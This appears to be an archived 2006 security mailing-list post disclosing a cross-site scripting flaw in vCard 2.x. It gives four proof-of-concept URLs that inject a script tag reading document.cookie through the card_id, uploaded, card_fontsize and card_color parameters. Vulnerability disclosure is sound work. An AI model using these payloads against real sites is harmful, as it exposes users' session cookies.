|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
XSS in vCard
xx_hack_xx_2004
hotmail.com
Date: Sat Mar 11 2006 - 12:20:24 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hello
Vulnerable: vCard 2.x
http://www.belchiorfoundry.com
Exploit :
http://example.com/vcard/create.php?card_id='><script>alert(document.cookie)</script>
http://example.com/vcard/create.php?uploaded='><script>alert(document.cookie)</script>
http://example.com/vcard/create.php?card_fontsize='><script>alert(document.cookie)</script>
http://example.com/vcard/create.php?card_color='><script>alert(document.cookie)</script>
Discovery by Linux_Drox
http://www.lezr.com
Best Regards
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]